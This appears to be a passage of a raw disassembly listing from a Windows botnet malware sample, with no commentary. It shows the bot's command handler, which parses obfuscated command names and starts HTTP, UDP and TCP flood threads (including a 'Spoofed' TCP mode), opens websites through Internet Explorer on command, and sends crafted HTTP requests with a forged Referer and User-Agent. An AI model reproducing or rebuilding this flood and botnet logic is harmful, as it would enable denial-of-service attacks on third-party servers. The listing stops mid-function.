push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
call ebx ; dword_42F070
test eax, eax
jnz loc_409B68
xor ebx, ebx
cmp [esi+4], ebx
jz loc_409B59
cmp [esi+8], ebx
jz loc_409B59
cmp [esi+0Ch], ebx
jz loc_409B59
cmp [esi+10h], ebx
jz loc_409B59
cmp [esi+14h], ebx
jz loc_409B59
push 16h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_4099CD
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aJjc1c1nn0bl0ty ; "JJc1c1nn0bL0TY84s/myQpz0"
jnz short loc_4099B6
cmp [ebp+arg_18], 0
jnz short loc_4099C0
push eax
push offset aHttpfThreads ; "HTTPF Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4099B6: ; CODE XREF: sub_403B2C+5E6C�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4099C0: ; CODE XREF: sub_403B2C+5E72�j
push [ebp+arg_C]
push offset aHttpfThreads ; "HTTPF Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_4099CD: ; CODE XREF: sub_403B2C+5E5C�j
mov eax, [ebp+arg_14]
mov [ebp+var_47F4], eax
mov eax, [ebp+arg_18]
mov [ebp+var_47F8], eax
cmp eax, ebx
lea eax, [ebp+var_4890]
jnz short loc_4099EE
push dword ptr [edi+0Ch]
jmp short loc_4099F0
; ---------------------------------------------------------------------------
loc_4099EE: ; CODE XREF: sub_403B2C+5EBB�j
push dword ptr [edi]
loc_4099F0: ; CODE XREF: sub_403B2C+5EC0�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
mov ebx, 3FFh
push ebx
mov [ebp+var_5094], eax
push dword ptr [esi+4]
lea eax, [ebp+var_5090]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_480C], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_4808], eax
push dword ptr [esi+10h]
call sub_422B5A
push ebx
mov [ebp+var_4800], eax
push dword ptr [esi+14h]
lea eax, [ebp+var_4C90]
push eax
call sub_4222F0
xor eax, eax
add esp, 24h
cmp [ebp+arg_68], eax
mov ebx, offset aJjc1c1nn0bl0ty ; "JJc1c1nn0bL0TY84s/myQpz0"
setnz al
cmp [ebp+var_4800], 1
mov [ebp+var_47FC], eax
jge short loc_409A78
loc_409A6E: ; CODE XREF: sub_403B2C+5AB3�j
; sub_403B2C+5CD3�j
mov esi, offset aSNoDelay_ ; "%s No delay."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_409A78: ; CODE XREF: sub_403B2C+5F40�j
cmp [ebp+arg_14], 0
jnz short loc_409AAF
cmp [ebp+arg_18], 0
jnz short loc_409AB5
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_409AAF: ; CODE XREF: sub_403B2C+5F50�j
cmp [ebp+arg_18], 0
jz short loc_409ADF
loc_409AB5: ; CODE XREF: sub_403B2C+5F56�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_409ADF: ; CODE XREF: sub_403B2C+5F87�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
push offset aSSDDPackets_ ; "%s --> (%s:%d) %d packets."
push 16h
call sub_41BED7
add esp, 18h
mov [ebp+var_4810], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_5094]
push esi
push eax
push offset loc_40DF88
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_4810]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_409B4B
; ---------------------------------------------------------------------------
loc_409B43: ; CODE XREF: sub_403B2C+6026�j
push 32h
call dword_42F15C ; Sleep
loc_409B4B: ; CODE XREF: sub_403B2C+6015�j
cmp [ebp+var_47F0], 0
jz short loc_409B43
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_409B59: ; CODE XREF: sub_403B2C+5E24�j
; sub_403B2C+5E2D�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aJjc1c1nn0bl0ty ; "JJc1c1nn0bL0TY84s/myQpz0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_409B68: ; CODE XREF: sub_403B2C+5E19�j
push dword ptr [esi]
push offset aErnniHm17t1qrn ; "ERNNi/HM17T1QRn4z10ge1I1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_409B91
push offset aHttpf ; "HTTPF"
push 16h
loc_409B7C: ; CODE XREF: sub_403B2C+D52�j
; sub_403B2C+139E�j ...
xor eax, eax
cmp [ebp+arg_18], eax
push eax
push [ebp+arg_20]
jnz loc_404883
push eax
jmp loc_40A15D
; ---------------------------------------------------------------------------
loc_409B91: ; CODE XREF: sub_403B2C+6047�j
push dword ptr [esi]
push offset aN3saa1expwu1 ; "n3sAa1exPWU1"
call ebx ; dword_42F070
test eax, eax
jnz loc_409DFE
xor ebx, ebx
cmp [esi+4], ebx
jz loc_409DEF
cmp [esi+8], ebx
jz loc_409DEF
cmp [esi+0Ch], ebx
jz loc_409DEF
cmp [esi+10h], ebx
jz loc_409DEF
push 17h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_409C1B
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset a75bqq0i7ucw0 ; "75bQQ0i7ucW0"
jnz short loc_409C04
cmp [ebp+arg_18], 0
jnz short loc_409C0E
push eax
push offset aUdpThreads ; "UDP Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_409C04: ; CODE XREF: sub_403B2C+60BA�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_409C0E: ; CODE XREF: sub_403B2C+60C0�j
push [ebp+arg_C]
push offset aUdpThreads ; "UDP Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_409C1B: ; CODE XREF: sub_403B2C+60AA�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_20]
mov [ebp+var_27C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_284], eax
cmp eax, ebx
mov [ebp+var_280], ecx
lea eax, [ebp+var_398]
jnz short loc_409C45
push dword ptr [edi+0Ch]
jmp short loc_409C47
; ---------------------------------------------------------------------------
loc_409C45: ; CODE XREF: sub_403B2C+6112�j
push dword ptr [edi]
loc_409C47: ; CODE XREF: sub_403B2C+6117�j
push eax
call dword_42F04C ; lstrcpyA
push 7Fh
lea eax, [ebp+var_318]
push dword ptr [esi+4]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_298], eax
push dword ptr [esi+0Ch]
call sub_422B5A
add esp, 14h
cmp eax, ebx
mov [ebp+var_294], eax
jnz short loc_409C99
push 2000h
push 400h
call sub_41409E
pop ecx
mov [ebp+var_294], eax
pop ecx
loc_409C99: ; CODE XREF: sub_403B2C+6154�j
push dword ptr [esi+10h]
call sub_422B5A
cmp eax, ebx
pop ecx
mov [ebp+var_290], eax
jnz short loc_409CB6
mov [ebp+var_290], 0Ah
loc_409CB6: ; CODE XREF: sub_403B2C+617E�j
mov esi, [esi+14h]
cmp esi, ebx
jz short loc_409CCC
push esi
call sub_422B5A
pop ecx
mov [ebp+var_28C], eax
jmp short loc_409CD2
; ---------------------------------------------------------------------------
loc_409CCC: ; CODE XREF: sub_403B2C+618F�j
mov [ebp+var_28C], ebx
loc_409CD2: ; CODE XREF: sub_403B2C+619E�j
mov eax, [ebp+arg_10]
mov ebx, offset a75bqq0i7ucw0 ; "75bQQ0i7ucW0"
mov [ebp+var_39C], eax
lea eax, [ebp+var_318]
push eax
push ebx
push offset aSS_0 ; "%s %s"
push 17h
call sub_41BED7
add esp, 10h
mov [ebp+var_288], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_39C]
push esi
push eax
push offset sub_41EA1B
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_288]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_409D74
cmp [ebp+arg_14], esi
jnz short loc_409D52
cmp [ebp+arg_18], esi
jnz short loc_409D5B
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aSFailedToSta_3 ; "%s Failed to start thread,error: <%d>."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_409D52: ; CODE XREF: sub_403B2C+6205�j
; sub_403B2C+62BE�j
cmp [ebp+arg_18], esi
jz loc_40AF54
loc_409D5B: ; CODE XREF: sub_403B2C+620A�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aSFailedToSta_3 ; "%s Failed to start thread,error: <%d>."
jmp loc_40ADA1
; ---------------------------------------------------------------------------
loc_409D6C: ; CODE XREF: sub_403B2C+624E�j
push 32h
call dword_42F15C ; Sleep
loc_409D74: ; CODE XREF: sub_403B2C+6200�j
cmp [ebp+var_274], esi
jz short loc_409D6C
cmp [ebp+arg_14], 0
mov esi, offset aSSendingDToSPa ; "%s Sending %d to: %s, Packet size: %d, "...
jnz short loc_409DB6
cmp [ebp+arg_18], 0
jnz short loc_409DC0
push [ebp+var_290]
lea eax, [ebp+var_318]
push [ebp+var_294]
push eax
push [ebp+var_298]
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 20h
loc_409DB6: ; CODE XREF: sub_403B2C+6259�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_409DC0: ; CODE XREF: sub_403B2C+625F�j
push [ebp+var_290]
lea eax, [ebp+var_318]
push [ebp+var_294]
push eax
push [ebp+var_298]
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 20h
xor esi, esi
jmp loc_409D52
; ---------------------------------------------------------------------------
loc_409DEF: ; CODE XREF: sub_403B2C+607B�j
; sub_403B2C+6084�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset a75bqq0i7ucw0 ; "75bQQ0i7ucW0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_409DFE: ; CODE XREF: sub_403B2C+6070�j
push dword ptr [esi]
push offset aBurnP75wk ; "/BURN/P75Wk/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_409E17
push offset off_434CCC
push 17h
jmp loc_40A155
; ---------------------------------------------------------------------------
loc_409E17: ; CODE XREF: sub_403B2C+62DD�j
push dword ptr [esi]
push offset aXxulc08o9rf0 ; "Xxulc08O9rf0"
call ebx ; dword_42F070
test eax, eax
jnz loc_409FB3
mov esi, offset aStopped_ ; "Stopped."
xor ebx, ebx
cmp [ebp+arg_18], ebx
push esi
push 11h
push ebx
push [ebp+arg_20]
jnz loc_409EF1
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
push esi
push 17h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
add esp, 40h
push esi
push 12h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
push esi
push 13h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
add esp, 40h
push esi
push 14h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
push esi
push 15h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
add esp, 40h
push esi
push 16h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
call sub_41C090
push esi
push 18h
push ebx
push [ebp+arg_20]
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
jmp loc_409FA6
; ---------------------------------------------------------------------------
loc_409EF1: ; CODE XREF: sub_403B2C+630D�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
push esi
push 17h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
add esp, 40h
push esi
push 12h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
push esi
push 13h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
add esp, 40h
push esi
push 14h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
push esi
push 15h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
add esp, 40h
push esi
push 16h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
call sub_41C090
push esi
push 18h
push ebx
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi]
loc_409FA6: ; CODE XREF: sub_403B2C+63C0�j
call sub_41C090
add esp, 40h
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_409FB3: ; CODE XREF: sub_403B2C+62F6�j
push dword ptr [esi]
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
call ebx ; dword_42F070
test eax, eax
jnz loc_40A141
cmp [esi+4], eax
jnz short loc_409FE4
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
loc_409FCE: ; CODE XREF: sub_403B2C+16C0�j
; sub_403B2C+3AEF�j
cmp [ebp+arg_14], eax
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
jnz loc_407742
cmp [ebp+arg_18], eax
jmp loc_40772C
; ---------------------------------------------------------------------------
loc_409FE4: ; CODE XREF: sub_403B2C+649B�j
push 18h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_40A037
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
jnz short loc_40A020
cmp [ebp+arg_18], 0
jnz short loc_40A02A
push eax
push offset aVisitthreads ; "VisitThreads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40A020: ; CODE XREF: sub_403B2C+64D6�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40A02A: ; CODE XREF: sub_403B2C+64DC�j
push [ebp+arg_C]
push offset aVisitThreads ; "Visit Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_40A037: ; CODE XREF: sub_403B2C+64C6�j
mov eax, [ebp+arg_14]
mov [ebp+var_1998], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1994], eax
test eax, eax
lea eax, [ebp+var_1A1C]
jnz short loc_40A058
push dword ptr [edi+0Ch]
jmp short loc_40A05A
; ---------------------------------------------------------------------------
loc_40A058: ; CODE XREF: sub_403B2C+6525�j
push dword ptr [edi]
loc_40A05A: ; CODE XREF: sub_403B2C+652A�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1B24], eax
push dword ptr [esi+4]
lea eax, [ebp+var_1B1C]
push eax
call sub_4222F0
mov eax, [esi+8]
add esp, 0Ch
test eax, eax
jz short loc_40A097
push 7Fh
push eax
lea eax, [ebp+var_1A9C]
push eax
call sub_4222F0
add esp, 0Ch
loc_40A097: ; CODE XREF: sub_403B2C+6557�j
cmp [ebp+arg_14], 0
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
jnz short loc_40A0BF
cmp [ebp+arg_18], 0
jnz short loc_40A0C5
push dword ptr [esi+4]
push ebx
push offset aSS__0 ; "%s --> (%s)."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_40A0BF: ; CODE XREF: sub_403B2C+6574�j
cmp [ebp+arg_18], 0
jz short loc_40A0DB
loc_40A0C5: ; CODE XREF: sub_403B2C+657A�j
push dword ptr [esi+4]
push ebx
push offset aSS__0 ; "%s --> (%s)."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 14h
loc_40A0DB: ; CODE XREF: sub_403B2C+6597�j
push dword ptr [esi+4]
push ebx
push offset aSS__0 ; "%s --> (%s)."
push 18h
call sub_41BED7
add esp, 10h
mov [ebp+var_199C], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_1B24]
push esi
push eax
push offset sub_42042B
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_199C]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_408CE9
jmp short loc_40A133
; ---------------------------------------------------------------------------
loc_40A12B: ; CODE XREF: sub_403B2C+660E�j
push 32h
call dword_42F15C ; Sleep
loc_40A133: ; CODE XREF: sub_403B2C+65FD�j
cmp [ebp+var_198C], 0
jz short loc_40A12B
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40A141: ; CODE XREF: sub_403B2C+6492�j
push dword ptr [esi]
push offset aUpx0wCz2ei0qrn ; "UPx0W/cz2EI0QRn4z10ge1I1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A173
push offset aVisit ; "Visit"
push 18h
loc_40A155: ; CODE XREF: sub_403B2C+59AB�j
; sub_403B2C+62E6�j
push 0
push [ebp+arg_20]
push [ebp+arg_18]
loc_40A15D: ; CODE XREF: sub_403B2C+6060�j
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [edi+0Ch]
loc_40A166: ; CODE XREF: sub_403B2C+75�j
; sub_403B2C+85�j ...
call sub_41C090
loc_40A16B: ; CODE XREF: sub_403B2C+446�j
; sub_403B2C+4F39�j
add esp, 20h
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40A173: ; CODE XREF: sub_403B2C+6620�j
push dword ptr [esi]
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
call ebx ; dword_42F070
test eax, eax
jnz loc_40A213
mov eax, [esi+4]
test eax, eax
jz loc_40A3FE
xor esi, esi
push esi
push esi
push eax
push offset aIexplore ; "iexplore"
push offset aOpen ; "open"
push esi
call dword_42F23C
test eax, eax
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
jz short loc_40A1E6
cmp [ebp+arg_14], 0
mov esi, offset aSSiteOpened_ ; "%s Site opened."
jnz short loc_40A1C9
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40A1C9: ; CODE XREF: sub_403B2C+668B�j
cmp [ebp+arg_18], 0
jz loc_404808
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 10h
xor esi, esi
jmp short loc_40A1FF
; ---------------------------------------------------------------------------
loc_40A1E6: ; CODE XREF: sub_403B2C+6680�j
cmp [ebp+arg_14], esi
jnz short loc_40A1FF
push ebx
push offset aSSiteFailedToO ; "%s Site failed to open."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40A1FF: ; CODE XREF: sub_403B2C+66B8�j
; sub_403B2C+66BD�j
cmp [ebp+arg_18], esi
jz loc_404808
push ebx
push offset aSSiteFailedToO ; "%s Site failed to open."
jmp loc_40484D
; ---------------------------------------------------------------------------
loc_40A213: ; CODE XREF: sub_403B2C+6652�j
push dword ptr [esi]
push offset aB2smo_whkew_qr ; "B2smo.WHkeW.QRn4z10ge1I1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A234
push eax
push offset aIexplore_exe ; "iexplore.exe"
call sub_418614
pop ecx
mov esi, offset aSStopped_ ; "%s Stopped."
pop ecx
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A234: ; CODE XREF: sub_403B2C+66F2�j
push dword ptr [esi]
push offset aX4cty1aeqwx ; "X4Cty1aEQwX/"
call ebx ; dword_42F070
test eax, eax
jnz loc_404808
cmp [esi+4], eax
jz loc_40A3FE
cmp [esi+8], eax
jz loc_40A3FE
cmp [esi+0Ch], eax
jz loc_40A3FE
cmp [esi+10h], eax
jz loc_40A3FE
lea eax, [ebp+var_5CAC]
push eax
push 101h
call dword_42F290 ; WSAStartup
push dword ptr [esi+4]
call dword_42F274 ; gethostbyname
mov ebx, eax
test ebx, ebx
jnz short loc_40A2A3
mov esi, offset aSSocketError_ ; "%s Socket Error."
loc_40A28F: ; CODE XREF: sub_403B2C+6706�j
cmp [ebp+arg_14], 0
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
jnz loc_407742
jmp loc_407732
; ---------------------------------------------------------------------------
loc_40A2A3: ; CODE XREF: sub_403B2C+675C�j
push 6
push 1
push 2
call dword_42F29C ; socket
mov [ebp+arg_C], eax
mov [ebp+var_16C], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_168], eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
call dword_42F2B8 ; ntohs
mov [ebp+var_16A], ax
lea eax, [ebp+var_16C]
push 10h
push eax
push [ebp+arg_C]
call dword_42F294 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40A35C
push dword ptr [esi+4]
lea eax, [ebp+var_42E0]
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\r\nReferer: %s\r\nUser-Agent"...
push 100h
push eax
call sub_42219B
add esp, 1Ch
xor ebx, ebx
lea eax, [ebp+var_42E0]
push ebx
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_42E0]
push eax
push [ebp+arg_C]
call dword_42F288 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40A35C
push ebx
lea eax, [ebp+var_3CD8]
push 80h
push eax
push [ebp+arg_C]
call dword_42F28C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_40A39F
loc_40A35C: ; CODE XREF: sub_403B2C+67C8�j
; sub_403B2C+6813�j
cmp [ebp+arg_14], 0
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
mov esi, offset aSSocketError_ ; "%s Socket Error."
jnz short loc_40A37C
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40A37C: ; CODE XREF: sub_403B2C+683E�j
cmp [ebp+arg_18], 0
jz short loc_40A391
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 10h
loc_40A391: ; CODE XREF: sub_403B2C+6854�j
push [ebp+arg_C]
call dword_42F298 ; closesocket
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40A39F: ; CODE XREF: sub_403B2C+682E�j
push [ebp+arg_C]
call dword_42F298 ; closesocket
lea eax, [ebp+var_3CD8]
push offset asc_433F80 ; "\n"
push eax
call sub_422248
push eax
lea eax, [ebp+var_ACAC]
push eax
call sub_422063
add esp, 10h
cmp [ebp+arg_14], ebx
mov esi, offset aS_1 ; "%s"
jnz short loc_40A3E9
lea eax, [ebp+var_ACAC]
push eax
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40A3E9: ; CODE XREF: sub_403B2C+68A5�j
cmp [ebp+arg_18], ebx
jz loc_404808
lea eax, [ebp+var_ACAC]
push eax
jmp loc_40484C
; ---------------------------------------------------------------------------
loc_40A3FE: ; CODE XREF: sub_403B2C+665D�j
; sub_403B2C+671C�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_40A40D: ; CODE XREF: sub_403B2C+4FD4�j
; sub_403B2C+4FE5�j ...
xor ebx, ebx
cmp [esi+4], ebx
jz loc_40A5E8
cmp [esi+8], ebx
jz loc_40A5E8
cmp [esi+0Ch], ebx
jz loc_40A5E8
cmp [esi+10h], ebx
jz loc_40A5E8
push 11h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jle short loc_40A486
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset a8sxng_tdfrt ; "8sXNG.tDfrt/"
jnz short loc_40A46F
cmp [ebp+arg_18], 0
jnz short loc_40A479
push eax
push offset aTcpThreads ; "Tcp Threads"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40A46F: ; CODE XREF: sub_403B2C+6925�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40A479: ; CODE XREF: sub_403B2C+692B�j
push [ebp+arg_C]
push offset aTcpThreads ; "Tcp Threads"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_40A486: ; CODE XREF: sub_403B2C+6915�j
mov eax, [ebp+arg_14]
mov [ebp+var_1070], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1074], eax
cmp eax, ebx
lea eax, [ebp+var_1108]
jnz short loc_40A4A7
push dword ptr [edi+0Ch]
jmp short loc_40A4A9
; ---------------------------------------------------------------------------
loc_40A4A7: ; CODE XREF: sub_403B2C+6974�j
push dword ptr [edi]
loc_40A4A9: ; CODE XREF: sub_403B2C+6979�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1210], eax
push dword ptr [esi+4]
lea eax, [ebp+var_1208]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_1084], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_1080], eax
push dword ptr [esi+10h]
call sub_422B5A
push 20h
mov [ebp+var_107C], eax
push dword ptr [esi]
lea eax, [ebp+var_1188]
push eax
call sub_4222F0
add esp, 24h
xor eax, eax
cmp [ebp+arg_68], ebx
setnz al
cmp eax, ebx
mov [ebp+var_1078], eax
mov ebx, offset aSpoofed ; "Spoofed"
jnz short loc_40A523
mov ebx, offset aNormal ; "Normal"
loc_40A523: ; CODE XREF: sub_403B2C+69F0�j
push dword ptr [esi+0Ch]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+8]
call sub_422B5A
pop ecx
push eax
push dword ptr [esi+4]
push ebx
mov ebx, offset a8sxng_tdfrt ; "8sXNG.tDfrt/"
push ebx
push offset aSSSDForDSecs_ ; "%s %s --> (%s:%d) for %d secs."
push 11h
call sub_41BED7
add esp, 1Ch
mov [ebp+var_1088], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_1210]
push esi
push eax
push offset sub_40C847
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_1088]
imul ecx, 1018h
cmp eax, esi
mov esi, dword_42F068
mov dword_46D414[ecx], eax
jnz short loc_40A5DD
cmp [ebp+arg_14], 0
jnz short loc_40A5B0
cmp [ebp+arg_18], 0
jnz short loc_40A5BA
call esi ; dword_42F068
push eax
push ebx
push offset aSFailedToSta_4 ; "%s Failed to start flood thread, error:"...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_40A5B0: ; CODE XREF: sub_403B2C+6A65�j
; sub_403B2C+6ABA�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40A5BA: ; CODE XREF: sub_403B2C+6A6B�j
call esi ; dword_42F068
push eax
push ebx
push offset aSFailedToSta_4 ; "%s Failed to start flood thread, error:"...
loc_40A5C3: ; CODE XREF: sub_403B2C+686�j
; sub_403B2C+A5B�j ...
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
loc_40A5CD: ; CODE XREF: sub_403B2C+104A�j
; sub_403B2C+1DD2�j ...
add esp, 14h
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40A5D5: ; CODE XREF: sub_403B2C+6AB8�j
push 32h
call dword_42F15C ; Sleep
loc_40A5DD: ; CODE XREF: sub_403B2C+6A5F�j
cmp [ebp+var_106C], 0
jz short loc_40A5D5
jmp short loc_40A5B0
; ---------------------------------------------------------------------------
loc_40A5E8: ; CODE XREF: sub_403B2C+68E6�j
; sub_403B2C+68EF�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
